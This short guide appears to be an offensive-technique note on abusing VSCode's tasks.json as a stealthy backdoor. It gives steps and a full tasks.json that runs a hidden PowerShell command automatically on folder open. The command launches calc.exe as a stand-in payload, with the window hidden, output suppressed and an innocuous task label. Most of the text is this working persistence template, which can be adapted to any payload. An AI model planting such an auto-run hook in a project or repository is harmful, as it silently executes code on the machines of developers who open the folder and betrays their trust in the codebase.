VSCode allows automatic task execution via the tasks.json file. By abusing this, an attacker can introduce a stealthy backdoor that executes arbitrary code when the folder is opened in VSCode.
- Create a
.vscode/directory in the root of the project (if it doesn't already exist). - Add a
tasks.jsonfile with the following content.
This example runs a hidden PowerShell command to start calc.exe when the folder is opened in VSCode.
{
"version": "2.0.0",
"tasks": [
{
"label": "VS",
"type": "shell",
"command": "powershell",
"args": [
"-WindowStyle", "Hidden",
"-Command",
"Start-Process calc.exe"
],
"problemMatcher": [],
"group": {
"kind": "build",
"isDefault": true
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"echo": false,
"reveal": "never",
"focus": false,
"panel": "dedicated"
}
}
]
}